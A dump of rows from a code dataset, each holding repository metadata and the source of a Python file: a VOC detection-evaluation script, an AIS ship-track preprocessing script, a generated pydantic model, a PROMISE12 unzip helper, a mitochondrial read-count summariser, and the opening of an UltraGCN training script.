hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ace93fc81fb4af2291927da36c6d64c315746def | 7,030 | py | Python | RFBNet-master/data/voc_eval.py | transcendentsky/detection_models | 185f4bcccd5ab2c2f8edac37c76a9ccc47f73883 | [
"Apache-2.0"
] | null | null | null | RFBNet-master/data/voc_eval.py | transcendentsky/detection_models | 185f4bcccd5ab2c2f8edac37c76a9ccc47f73883 | [
"Apache-2.0"
] | null | null | null | RFBNet-master/data/voc_eval.py | transcendentsky/detection_models | 185f4bcccd5ab2c2f8edac37c76a9ccc47f73883 | [
"Apache-2.0"
] | null | null | null | # --------------------------------------------------------
# Fast/er R-CNN
# Licensed under The MIT License [see LICENSE for details]
# Written by Bharath Hariharan
# --------------------------------------------------------
import xml.etree.ElementTree as ET
import os
import pickle
import numpy as np
import pdb
def parse_rec(filename):
    """Parse a PASCAL VOC annotation XML file into a list of object dicts.

    Each dict carries the object's name, pose, truncated/difficult flags
    and its bounding box as [xmin, ymin, xmax, ymax].
    """
    root = ET.parse(filename)
    parsed = []
    for node in root.findall('object'):
        box = node.find('bndbox')
        parsed.append({
            'name': node.find('name').text,
            'pose': node.find('pose').text,
            'truncated': int(node.find('truncated').text),
            'difficult': int(node.find('difficult').text),
            'bbox': [int(box.find(tag).text)
                     for tag in ('xmin', 'ymin', 'xmax', 'ymax')],
        })
    return parsed
def voc_ap(rec, prec, use_07_metric=False):
    """ ap = voc_ap(rec, prec, [use_07_metric])
    Compute VOC AP given precision and recall.
    If use_07_metric is true, uses the
    VOC 07 11 point method (default:False).
    """
    if use_07_metric:
        # 11-point metric: average the max precision at recall >= t
        # for t in {0.0, 0.1, ..., 1.0}.
        ap = 0.
        for t in np.arange(0., 1.1, 0.1):
            mask = rec >= t
            p = np.max(prec[mask]) if np.sum(mask) > 0 else 0
            ap += p / 11.
        return ap
    # Exact AP: append sentinels, take the monotone precision envelope,
    # then integrate precision over the recall steps.
    mrec = np.concatenate(([0.], rec, [1.]))
    mpre = np.concatenate(([0.], prec, [0.]))
    # Precision envelope (running max from the right).
    for i in range(mpre.size - 1, 0, -1):
        mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
    # Points where the recall (X axis) changes value.
    idx = np.where(mrec[1:] != mrec[:-1])[0]
    # Sum (delta recall) * precision over those steps.
    return np.sum((mrec[idx + 1] - mrec[idx]) * mpre[idx + 1])
def voc_eval(detpath,
             annopath,
             imagesetfile,
             classname,
             cachedir,
             ovthresh=0.5,
             use_07_metric=False):
    """rec, prec, ap = voc_eval(detpath,
                                annopath,
                                imagesetfile,
                                classname,
                                [ovthresh],
                                [use_07_metric])

    Top level function that does the PASCAL VOC evaluation.

    detpath: Path to detections
        detpath.format(classname) should produce the detection results file.
    annopath: Path to annotations
        annopath.format(imagename) should be the xml annotations file.
    imagesetfile: Text file containing the list of images, one image per line.
    classname: Category name (duh)
    cachedir: Directory for caching the annotations
    [ovthresh]: Overlap threshold (default = 0.5)
    [use_07_metric]: Whether to use VOC07's 11 point AP computation
        (default False)
    """
    # assumes detections are in detpath.format(classname)
    # assumes annotations are in annopath.format(imagename)
    # assumes imagesetfile is a text file with each line an image name
    # cachedir caches the annotations in a pickle file

    # first load gt
    if not os.path.isdir(cachedir):
        os.mkdir(cachedir)
    cachefile = os.path.join(cachedir, 'annots.pkl')
    # read list of images
    with open(imagesetfile, 'r') as f:
        lines = f.readlines()
    imagenames = [x.strip() for x in lines]

    if not os.path.isfile(cachefile):
        # parse every annotation file once and cache the result
        recs = {}
        for i, imagename in enumerate(imagenames):
            recs[imagename] = parse_rec(annopath.format(imagename))
            if i % 100 == 0:
                print('Reading annotation for {:d}/{:d}'.format(
                    i + 1, len(imagenames)))
        # save
        print('Saving cached annotations to {:s}'.format(cachefile))
        with open(cachefile, 'wb') as f:
            pickle.dump(recs, f)
    else:
        # load cached annotations
        with open(cachefile, 'rb') as f:
            recs = pickle.load(f)

    # extract gt objects for this class
    class_recs = {}
    npos = 0
    for imagename in imagenames:
        R = [obj for obj in recs[imagename] if obj['name'] == classname]
        bbox = np.array([x['bbox'] for x in R])
        # np.bool was removed in recent numpy releases; builtin bool is the
        # documented replacement and behaves identically here.
        difficult = np.array([x['difficult'] for x in R]).astype(bool)
        det = [False] * len(R)
        # "difficult" ground truths are excluded from the positive count
        npos = npos + sum(~difficult)
        class_recs[imagename] = {'bbox': bbox,
                                 'difficult': difficult,
                                 'det': det}

    # read dets
    detfile = detpath.format(classname)
    with open(detfile, 'r') as f:
        lines = f.readlines()

    splitlines = [x.strip().split(' ') for x in lines]
    image_ids = [x[0] for x in splitlines]
    confidence = np.array([float(x[1]) for x in splitlines])
    BB = np.array([[float(z) for z in x[2:]] for x in splitlines])

    # sort by confidence (descending)
    sorted_ind = np.argsort(-confidence)
    sorted_scores = np.sort(-confidence)
    try:
        BB = BB[sorted_ind, :]
    except IndexError:
        # BB is 1-D when there are no detections; plain indexing still works.
        BB = BB[sorted_ind]
    image_ids = [image_ids[x] for x in sorted_ind]

    # go down dets and mark TPs and FPs
    nd = len(image_ids)
    tp = np.zeros(nd)
    fp = np.zeros(nd)
    for d in range(nd):
        R = class_recs[image_ids[d]]
        bb = BB[d, :].astype(float)
        ovmax = -np.inf
        BBGT = R['bbox'].astype(float)
        if BBGT.size > 0:
            # compute overlaps: intersection of bb with every GT box
            ixmin = np.maximum(BBGT[:, 0], bb[0])
            iymin = np.maximum(BBGT[:, 1], bb[1])
            ixmax = np.minimum(BBGT[:, 2], bb[2])
            iymax = np.minimum(BBGT[:, 3], bb[3])
            iw = np.maximum(ixmax - ixmin + 1., 0.)
            ih = np.maximum(iymax - iymin + 1., 0.)
            inters = iw * ih
            # union
            uni = ((bb[2] - bb[0] + 1.) * (bb[3] - bb[1] + 1.) +
                   (BBGT[:, 2] - BBGT[:, 0] + 1.) *
                   (BBGT[:, 3] - BBGT[:, 1] + 1.) - inters)
            overlaps = inters / uni
            ovmax = np.max(overlaps)
            jmax = np.argmax(overlaps)

        if ovmax > ovthresh:
            if not R['difficult'][jmax]:
                if not R['det'][jmax]:
                    # first detection matching this GT box: true positive
                    tp[d] = 1.
                    R['det'][jmax] = 1
                else:
                    # duplicate detection of an already-matched box
                    fp[d] = 1.
        else:
            fp[d] = 1.

    # compute precision recall
    fp = np.cumsum(fp)
    tp = np.cumsum(tp)
    rec = tp / float(npos)
    # avoid divide by zero in case the first detection matches a difficult
    # ground truth
    prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
    ap = voc_ap(rec, prec, use_07_metric)

    return rec, prec, ap
| 33.798077 | 78 | 0.522475 |
ace93fdb028d16cec4b8dd5f65ba2e987098f35e | 12,436 | py | Python | data/csv2pkl.py | dnguyengithub/MultitaskAIS | b2862f27513f6f9de25d345451cfc00bb21cd9f3 | [
"MIT"
] | 62 | 2018-12-08T13:20:06.000Z | 2022-03-30T11:04:31.000Z | data/csv2pkl.py | dnguyengithub/MultitaskAIS | b2862f27513f6f9de25d345451cfc00bb21cd9f3 | [
"MIT"
] | 21 | 2019-03-07T11:24:54.000Z | 2020-12-24T04:05:08.000Z | data/csv2pkl.py | dnguyengithub/MultitaskAIS | b2862f27513f6f9de25d345451cfc00bb21cd9f3 | [
"MIT"
] | 35 | 2019-02-14T14:44:36.000Z | 2022-02-27T14:32:21.000Z | # coding: utf-8
# MIT License
#
# Copyright (c) 2018 Duong Nguyen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ==============================================================================
"""
A script to merge AIS messages into AIS tracks.
"""
import numpy as np
import matplotlib.pyplot as plt
import os
import sys
#sys.path.append("..")
#import utils
import pickle
import copy
import csv
from datetime import datetime
import time
from io import StringIO
from tqdm import tqdm as tqdm
## PARAMS
#======================================
## Bretagne dataset
# LAT_MIN = 46.5
# LAT_MAX = 50.5
# LON_MIN = -8.0
# LON_MAX = -3.0
# # Pkl filenames.
# pkl_filename = "bretagne_20170103_track.pkl"
# pkl_filename_train = "bretagne_20170103_10_20_train_track.pkl"
# pkl_filename_valid = "bretagne_20170103_10_20_valid_track.pkl"
# pkl_filename_test = "bretagne_20170103_10_20_test_track.pkl"
# # Path to csv files.
# dataset_path = "./"
# l_csv_filename =["positions_bretagne_jan_mar_2017.csv"]
# # Training/validation/test/total period.
# t_train_min = time.mktime(time.strptime("01/01/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
# t_train_max = time.mktime(time.strptime("10/03/2017 23:59:59", "%d/%m/%Y %H:%M:%S"))
# t_valid_min = time.mktime(time.strptime("11/03/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
# t_valid_max = time.mktime(time.strptime("20/03/2017 23:59:59", "%d/%m/%Y %H:%M:%S"))
# t_test_min = time.mktime(time.strptime("21/03/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
# t_test_max = time.mktime(time.strptime("31/03/2017 23:59:59", "%d/%m/%Y %H:%M:%S"))
# t_min = time.mktime(time.strptime("01/01/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
# t_max = time.mktime(time.strptime("31/03/2017 23:59:59", "%d/%m/%Y %H:%M:%S"))
# cargo_tanker_filename = "bretagne_20170103_cargo_tanker.npy"
# ## Aruba
LAT_MIN = 9.0
LAT_MAX = 14.0
LON_MIN = -71.0
LON_MAX = -66.0
D2C_MIN = 2000 #meters
# Path to csv files.
"""
dataset_path = "./"
l_csv_filename =["aruba_5x5deg_2017305_2018031.csv",
"aruba_5x5deg_2018305_2019031.csv",
"aruba_5x5deg_2019305_2020031.csv"]
l_csv_filename =["aruba_5x5deg_2017305_2018031.csv"]
pkl_filename = "aruba_20172020_track.pkl"
pkl_filename_train = "aruba_20172020_train_track.pkl"
pkl_filename_valid = "aruba_20172020_valid_track.pkl"
pkl_filename_test = "aruba_20172020_test_track.pkl"
cargo_tanker_filename = "aruba_20172020_cargo_tanker.npy"
t_train_min = time.mktime(time.strptime("01/01/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_train_max = time.mktime(time.strptime("31/01/2019 23:59:59", "%d/%m/%Y %H:%M:%S"))
t_valid_min = time.mktime(time.strptime("01/11/2019 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_valid_max = time.mktime(time.strptime("31/12/2019 23:59:59", "%d/%m/%Y %H:%M:%S"))
t_test_min = time.mktime(time.strptime("01/01/2020 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_test_max = time.mktime(time.strptime("31/01/2020 23:59:59", "%d/%m/%Y %H:%M:%S"))
t_min = time.mktime(time.strptime("01/01/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_max = time.mktime(time.strptime("31/01/2020 23:59:59", "%d/%m/%Y %H:%M:%S"))
"""
dataset_path = "./"
l_csv_filename =["aruba_zone1_5x5deg_2017121_2017244.csv",
"aruba_5x5deg_2018121_2018244.csv",
"aruba_zone1_5x5deg_2019121_2019244.csv"]
#l_csv_filename =["aruba_5x5deg_2018121_2018244.csv"]
pkl_filename = "aruba_20172020_summer_track.pkl"
pkl_filename_train = "aruba_20172020_summer_train_track.pkl"
pkl_filename_valid = "aruba_20172020_summer_valid_track.pkl"
pkl_filename_test = "aruba_20172020_summer_test_track.pkl"
cargo_tanker_filename = "aruba_20172020_summer_cargo_tanker.npy"
t_train_min = time.mktime(time.strptime("01/01/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_train_max = time.mktime(time.strptime("31/08/2018 23:59:59", "%d/%m/%Y %H:%M:%S"))
t_valid_min = time.mktime(time.strptime("01/05/2019 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_valid_max = time.mktime(time.strptime("31/07/2019 23:59:59", "%d/%m/%Y %H:%M:%S"))
t_test_min = time.mktime(time.strptime("01/08/2019 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_test_max = time.mktime(time.strptime("31/08/2019 23:59:59", "%d/%m/%Y %H:%M:%S"))
t_min = time.mktime(time.strptime("01/01/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_max = time.mktime(time.strptime("31/01/2020 23:59:59", "%d/%m/%Y %H:%M:%S"))
#========================================================================
LAT_RANGE = LAT_MAX - LAT_MIN
LON_RANGE = LON_MAX - LON_MIN
SOG_MAX = 30.0 # the SOG is truncated to 30.0 knots max.
EPOCH = datetime(1970, 1, 1)
LAT, LON, SOG, COG, HEADING, ROT, NAV_STT, TIMESTAMP, MMSI, SHIPTYPE, D2C = list(range(11))
CARGO_TANKER_ONLY = True
if CARGO_TANKER_ONLY:
pkl_filename = "ct_"+pkl_filename
pkl_filename_train = "ct_"+pkl_filename_train
pkl_filename_valid = "ct_"+pkl_filename_valid
pkl_filename_test = "ct_"+pkl_filename_test
print(pkl_filename_train)
## LOADING CSV FILES
#======================================
l_l_msg = [] # list of AIS messages, each row is a message (list of AIS attributes)
n_error = 0
for csv_filename in l_csv_filename:
    data_path = os.path.join(dataset_path, csv_filename)
    with open(data_path, "r") as f:
        print("Reading ", csv_filename, "...")
        csvReader = csv.reader(f)
        next(csvReader) # skip the legend row
        for row in csvReader:
            # utc_time = datetime.strptime(row[8], "%Y/%m/%d %H:%M:%S")
            # timestamp = (utc_time - EPOCH).total_seconds()
            # Column order matches LAT, LON, SOG, COG, HEADING, ROT,
            # NAV_STT, TIMESTAMP, MMSI, SHIPTYPE, D2C defined below.
            try:
                l_l_msg.append([float(row[5]), float(row[6]),
                                float(row[7]), float(row[8]),
                                int(row[9]), float(row[12]),
                                int(row[11]), int(row[4]),
                                int(float(row[1])),
                                int(row[13]),
                                float(row[14])])
            except (ValueError, IndexError):
                # Malformed row: count it and keep going. The per-row debug
                # print of a running counter was removed (it dominated the
                # runtime on multi-million-row files).
                n_error += 1
                continue
m_msg = np.array(l_l_msg)
#del l_l_msg
print("Total number of AIS messages: ",m_msg.shape[0])
print("Lat min: ",np.min(m_msg[:,LAT]), "Lat max: ",np.max(m_msg[:,LAT]))
print("Lon min: ",np.min(m_msg[:,LON]), "Lon max: ",np.max(m_msg[:,LON]))
print("Ts min: ",np.min(m_msg[:,TIMESTAMP]), "Ts max: ",np.max(m_msg[:,TIMESTAMP]))
# Heuristic unit fix: 1584720228 is a 2020 epoch in seconds; a first
# timestamp above it presumably means the column is in milliseconds.
if m_msg[0,TIMESTAMP] > 1584720228:
    m_msg[:,TIMESTAMP] = m_msg[:,TIMESTAMP]/1000 # Convert to suitable timestamp format
print("Time min: ",datetime.utcfromtimestamp(np.min(m_msg[:,TIMESTAMP])).strftime('%Y-%m-%d %H:%M:%SZ'))
print("Time max: ",datetime.utcfromtimestamp(np.max(m_msg[:,TIMESTAMP])).strftime('%Y-%m-%d %H:%M:%SZ'))
## Vessel Type
#======================================
print("Selecting vessel type ...")
def sublist(lst1, lst2):
    """Return True when the elements common to both lists are non-empty
    and appear in the same relative order in each list."""
    common_in_1 = [item for item in lst1 if item in lst2]
    common_in_2 = [item for item in lst2 if item in lst1]
    return bool(common_in_1) and common_in_1 == common_in_2
# Build a per-MMSI list of every ship type reported for that vessel.
VesselTypes = dict()
l_mmsi = []
n_error = 0
for v_msg in tqdm(m_msg):
    try:
        mmsi_ = v_msg[MMSI]
        type_ = v_msg[SHIPTYPE]
        if mmsi_ not in l_mmsi :
            VesselTypes[mmsi_] = [type_]
            l_mmsi.append(mmsi_)
        elif type_ not in VesselTypes[mmsi_]:
            VesselTypes[mmsi_].append(type_)
    except:
        # malformed message: skip and count
        n_error += 1
        continue
print(n_error)
for mmsi_ in tqdm(list(VesselTypes.keys())):
    VesselTypes[mmsi_] = np.sort(VesselTypes[mmsi_])
# AIS type codes 70-79 = cargo, 80-89 = tanker, 30 = fishing; a vessel is
# classified only when all its reported types fall inside one range.
l_cargo_tanker = []
l_fishing = []
for mmsi_ in list(VesselTypes.keys()):
    if sublist(VesselTypes[mmsi_], list(range(70,80))) or sublist(VesselTypes[mmsi_], list(range(80,90))):
        l_cargo_tanker.append(mmsi_)
    if sublist(VesselTypes[mmsi_], [30]):
        l_fishing.append(mmsi_)
print("Total number of vessels: ",len(VesselTypes))
print("Total number of cargos/tankers: ",len(l_cargo_tanker))
print("Total number of fishing: ",len(l_fishing))
print("Saving vessels' type list to ", cargo_tanker_filename)
np.save(cargo_tanker_filename,l_cargo_tanker)
np.save(cargo_tanker_filename.replace("_cargo_tanker.npy","_fishing.npy"),l_fishing)
## FILTERING
#======================================
# Selecting AIS messages in the ROI and in the period of interest.
## LAT LON
m_msg = m_msg[m_msg[:,LAT]>=LAT_MIN]
m_msg = m_msg[m_msg[:,LAT]<=LAT_MAX]
m_msg = m_msg[m_msg[:,LON]>=LON_MIN]
m_msg = m_msg[m_msg[:,LON]<=LON_MAX]
# SOG: keep plausible speeds only
m_msg = m_msg[m_msg[:,SOG]>=0]
m_msg = m_msg[m_msg[:,SOG]<=SOG_MAX]
# COG
# Bug fix: the lower bound previously re-filtered SOG>=0 instead of COG>=0.
m_msg = m_msg[m_msg[:,COG]>=0]
m_msg = m_msg[m_msg[:,COG]<=360]
# D2C: keep vessels at least D2C_MIN meters from the coast
m_msg = m_msg[m_msg[:,D2C]>=D2C_MIN]
# TIME: restrict to the overall period of interest
m_msg = m_msg[m_msg[:,TIMESTAMP]>=0]
m_msg = m_msg[m_msg[:,TIMESTAMP]>=t_min]
m_msg = m_msg[m_msg[:,TIMESTAMP]<=t_max]
m_msg_train = m_msg[m_msg[:,TIMESTAMP]>=t_train_min]
m_msg_train = m_msg_train[m_msg_train[:,TIMESTAMP]<=t_train_max]
m_msg_valid = m_msg[m_msg[:,TIMESTAMP]>=t_valid_min]
m_msg_valid = m_msg_valid[m_msg_valid[:,TIMESTAMP]<=t_valid_max]
m_msg_test = m_msg[m_msg[:,TIMESTAMP]>=t_test_min]
m_msg_test = m_msg_test[m_msg_test[:,TIMESTAMP]<=t_test_max]
print("Total msgs: ",len(m_msg))
print("Number of msgs in the training set: ",len(m_msg_train))
print("Number of msgs in the validation set: ",len(m_msg_valid))
print("Number of msgs in the test set: ",len(m_msg_test))
## MERGING INTO DICT
#======================================
# Creating AIS tracks from the list of AIS messages.
# Each AIS track is formatted by a dictionary.
print("Convert to dicts of vessel's tracks...")

def build_track_dict(m_msg_subset):
    """Group AIS messages by MMSI into time-sorted track arrays.

    Drops non cargo/tanker vessels when CARGO_TANKER_ONLY is set.
    The previous code repeated this logic verbatim for the train,
    validation and test splits; behavior is unchanged.
    """
    tracks = dict()
    for v_msg in tqdm(m_msg_subset):
        mmsi = int(v_msg[MMSI])
        if mmsi not in tracks:
            tracks[mmsi] = np.empty((0, 9))
        tracks[mmsi] = np.concatenate(
            (tracks[mmsi], np.expand_dims(v_msg[:9], 0)), axis=0)
    for key in tqdm(list(tracks.keys())):
        if CARGO_TANKER_ONLY and (key not in l_cargo_tanker):
            del tracks[key]
        else:
            # sort each track chronologically
            tracks[key] = np.array(
                sorted(tracks[key], key=lambda m_entry: m_entry[TIMESTAMP]))
    return tracks

# Training set
Vs_train = build_track_dict(m_msg_train)
# Validation set
Vs_valid = build_track_dict(m_msg_valid)
# Test set
Vs_test = build_track_dict(m_msg_test)
## PICKLING
#======================================
# Write each split to its own pickle file as a {mmsi: track array} dict.
for filename, filedict in zip([pkl_filename_train,pkl_filename_valid,pkl_filename_test],
                              [Vs_train,Vs_valid,Vs_test]
                             ):
    print("Writing to ", os.path.join(dataset_path,filename),"...")
    with open(os.path.join(dataset_path,filename),"wb") as f:
        pickle.dump(filedict,f)
    print("Total number of tracks: ", len(filedict))
| 37.914634 | 106 | 0.649807 |
ace940f0f27ff84f6810829e55e1e86c12ac4b3e | 298 | py | Python | tests/data/expected/main/main_jsonschema_ids/type.py | adaamz/datamodel-code-generator | 3b34573f35f8d420e4668a85047c757fd1da7754 | [
"MIT"
] | 891 | 2019-07-23T04:23:32.000Z | 2022-03-31T13:36:33.000Z | tests/data/expected/main/main_jsonschema_ids/type.py | adaamz/datamodel-code-generator | 3b34573f35f8d420e4668a85047c757fd1da7754 | [
"MIT"
] | 663 | 2019-07-23T09:50:26.000Z | 2022-03-29T01:56:55.000Z | tests/data/expected/main/main_jsonschema_ids/type.py | adaamz/datamodel-code-generator | 3b34573f35f8d420e4668a85047c757fd1da7754 | [
"MIT"
] | 108 | 2019-07-23T08:50:37.000Z | 2022-03-09T10:50:22.000Z | # generated by datamodel-codegen:
# filename: Organization.schema.json
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from pydantic import BaseModel, Field
class Schema(BaseModel):
    """Generated pydantic model whose root value is a plain string.

    Wraps the JSON-schema ``type`` field ("Type of this object.").
    """
    __root__: str = Field(..., description='Type of this object.', title='type')
ace94138d76eba5e725120f61f43971c819f0faf | 640 | py | Python | data/PROMISE12/setup.py | elias-1/NiftyNet | 05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2 | [
"Apache-2.0"
] | 1,403 | 2017-08-30T11:49:45.000Z | 2022-03-31T11:44:05.000Z | data/PROMISE12/setup.py | elias-1/NiftyNet | 05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2 | [
"Apache-2.0"
] | 360 | 2017-10-03T15:33:53.000Z | 2021-03-17T06:27:38.000Z | data/PROMISE12/setup.py | elias-1/NiftyNet | 05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2 | [
"Apache-2.0"
] | 464 | 2017-09-13T20:56:32.000Z | 2022-02-11T20:33:47.000Z | """
Unzip data downloaded from challenge website:
https://promise12.grand-challenge.org/
The outcome should be three folders named:
TrainingData_Part1, TrainingData_Part2, TrainingData_Part3
each folder contains multiple '.mhd' and '.raw' files
"""
import os
import zipfile

zip_dir = '.'
target_dir = '.'

# Extract each training-data archive into a folder named after the zip.
# A tuple (not a set) gives a deterministic extraction order, and the
# context manager guarantees the archive is closed even on failure.
for zip_filename in ('TrainingData_Part1.zip', 'TrainingData_Part2.zip',
                     'TrainingData_Part3.zip'):
    print('Extracting', zip_filename, '...')
    with zipfile.ZipFile(os.path.join(zip_dir, zip_filename), 'r') as zip_ref:
        zip_ref.extractall(os.path.basename(zip_filename.replace('.zip', '')))
| 32 | 74 | 0.71875 |
ace941a97108bbf77b0a8960eba5bf85c89bdbce | 3,069 | py | Python | mgatk/bin/python/sumstatsBPtenx.py | bobermayer/mgatk | 735cc217f5409519b22eae8b79c887eca11bf12d | [
"MIT"
] | 55 | 2020-01-21T15:47:26.000Z | 2022-03-08T06:53:22.000Z | mgatk/bin/python/sumstatsBPtenx.py | bobermayer/mgatk | 735cc217f5409519b22eae8b79c887eca11bf12d | [
"MIT"
] | 37 | 2020-06-12T08:58:41.000Z | 2022-03-11T19:49:44.000Z | mgatk/bin/python/sumstatsBPtenx.py | bobermayer/mgatk | 735cc217f5409519b22eae8b79c887eca11bf12d | [
"MIT"
] | 10 | 2020-08-24T16:23:00.000Z | 2021-12-17T21:54:34.000Z | #!/usr/bin/python
###################################################
# Summarizes the total number of reads per position / strand
###################################################
import sys
import re
import os
import pysam
import numpy as np
bam_file = sys.argv[1]
barcodes_file = sys.argv[2]
out_pre = sys.argv[3]
max_bp = int(sys.argv[4])
base_qual = float(sys.argv[5])
fasta_file = sys.argv[6]
alignment_quality = float(sys.argv[7])
barcode_tag = sys.argv[8]
# Import barcodes
with open(barcodes_file) as barcode_file_handle:
content = barcode_file_handle.readlines()
bcs = [x.strip() for x in content]
bam_input = pysam.AlignmentFile(bam_file, "rb")
dna_letters = ['A','C','G','T']
def getBarcode(intags):
    '''
    Return the value of the configured cell-barcode tag (barcode_tag)
    from a read's tag list, or "NA" when the tag is absent.
    '''
    return next((tag[1] for tag in intags if tag[0] == barcode_tag), "NA")
# Dimension cell x position x letter x strand
# Coverage associated with the bases
ca = np.zeros((len(bcs),max_bp,4,2), dtype=int)
for read in bam_input:
    # Strand index: 0 = forward, 1 = reverse.
    if(read.is_reverse):
        s_idx = 1
    else:
        s_idx = 0
    # Get read attributes
    seq = read.seq
    quality = read.query_qualities
    align_qual_read = read.mapping_quality
    cell_barcode = getBarcode(read.tags)
    # Only count reads that carry one of the whitelisted cell barcodes.
    if(cell_barcode != "NA"):
        c_idx = bcs.index(cell_barcode)
        # get_aligned_pairs(True): presumably matches_only -- confirm
        # against the pinned pysam version's signature.
        for q_idx, p_idx in read.get_aligned_pairs(True):
            if q_idx is not None and p_idx is not None and align_qual_read > alignment_quality:
                # Require base quality above threshold and an unambiguous base.
                if(quality[q_idx] > base_qual and seq[q_idx] in dna_letters):
                    l_idx = dna_letters.index(seq[q_idx])
                    ca[c_idx,p_idx,l_idx,s_idx] += 1
# Function to write the slice of the matrix that is associated with the
def writeSparseMatrixLetter(letter, letter_idx):
    """Write sparse per-position counts for one base to <out_pre>.<letter>.txt.

    Output lines are "position,barcode,forward_count,reverse_count";
    positions are 1-based and zero-count positions are skipped.
    """
    out_file_fn = out_pre + "."+letter+".txt"
    with open(out_file_fn,"w") as file_handle_fn:
        for cell_idx, cell_name in enumerate(bcs):
            # Pull out the stranded counts
            fw_vec = ca[cell_idx,:,letter_idx,0].ravel()
            rev_vec = ca[cell_idx,:,letter_idx,1].ravel()
            # Write each position
            for i in range(0,int(max_bp)):
                if(fw_vec[i] > 0 or rev_vec[i] > 0):
                    file_handle_fn.write(str(i+1)+","+cell_name+","+str(fw_vec[i])+","+str(rev_vec[i])+"\n")
# Emit one sparse count file per nucleotide.
writeSparseMatrixLetter("A", 0)
writeSparseMatrixLetter("C", 1)
writeSparseMatrixLetter("G", 2)
writeSparseMatrixLetter("T", 3)
# Export the per-base coverage for the thrill of it and the depth
out_file_depth = out_pre.replace("/temp/sparse_matrices/", "/qc/depth/") + ".depth.txt"
out_file_coverage= out_pre + ".coverage.txt"
with open(out_file_coverage,"w") as file_handle_cov:
    with open(out_file_depth,"w") as file_handle_depth:
        # Loop over cells
        for cell_idx, cell_name in enumerate(bcs):
            # Pull out the summed counts per cell per position
            # (summing over letter and strand axes).
            cov_vec = np.sum(ca[cell_idx,:,:,:], axis = (1,2)).tolist()
            # Mean coverage over all positions, rounded to 2 decimals.
            depth = round(sum(cov_vec)/len(cov_vec),2)
            # Write each position (1-based, non-zero coverage only)
            for i in range(0,int(max_bp)):
                if(cov_vec[i] > 0):
                    file_handle_cov.write(str(i+1)+","+cell_name+","+str(cov_vec[i])+"\n")
            # Now write the depth
            file_handle_depth.write(cell_name+"\t"+str(depth)+"\n")
| 28.416667 | 93 | 0.675138 |
ace941ae0aafe259aa90de5508dd482b34d182a8 | 3,127 | py | Python | examples/train_ultragcn.py | TedSIWEILIU/beta-recsys | e2289fca42151b6027a309537a58816ff24184c4 | [
"MIT"
] | null | null | null | examples/train_ultragcn.py | TedSIWEILIU/beta-recsys | e2289fca42151b6027a309537a58816ff24184c4 | [
"MIT"
] | null | null | null | examples/train_ultragcn.py | TedSIWEILIU/beta-recsys | e2289fca42151b6027a309537a58816ff24184c4 | [
"MIT"
] | null | null | null | """isort:skip_file."""
import argparse
import os
import sys
sys.path.append("../")
from beta_rec.core.train_engine import TrainEngine
from beta_rec.models.ultragcn import UltraGCNEngine
from beta_rec.utils.monitor import Monitor
def parse_args():
    """Parse command-line arguments for the UltraGCN training script.

    Values given on the command line override the corresponding entries
    read from the JSON config file.

    Returns:
        argparse.Namespace: the parsed arguments.
    """
    parser = argparse.ArgumentParser(description="Run UltraGCN..")
    parser.add_argument(
        "--config_file",
        nargs="?",
        type=str,
        default="../configs/ultragcn_default.json",
        help="Specify the config file name. Only accept a file from ../configs/",
    )
    # If the following settings are specified with command line,
    # These settings will used to update the parameters received from the config file.
    parser.add_argument(
